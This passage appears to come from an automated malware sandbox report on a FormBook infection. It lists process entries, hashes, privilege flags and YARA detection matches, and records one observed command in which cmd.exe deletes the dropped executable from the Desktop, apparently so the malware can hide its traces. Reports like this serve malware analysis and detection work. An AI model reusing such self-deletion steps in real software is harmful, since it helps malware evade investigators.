                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.373929378.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Target ID:13
                                                Start time:14:02:00
                                                Start date:28/01/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff662bf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.358128872.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.337152454.000000000B7CA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:16
                                                Start time:14:02:27
                                                Start date:28/01/2022
                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                Imagebase:0xb10000
                                                File size:3611360 bytes
                                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.510355464.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.509514447.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.509765743.0000000004E60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Target ID:19
                                                Start time:14:02:33
                                                Start date:28/01/2022
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
                                                Imagebase:0x870000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Target ID:20
                                                Start time:14:02:35
                                                Start date:28/01/2022
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff774ee0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                No disassembly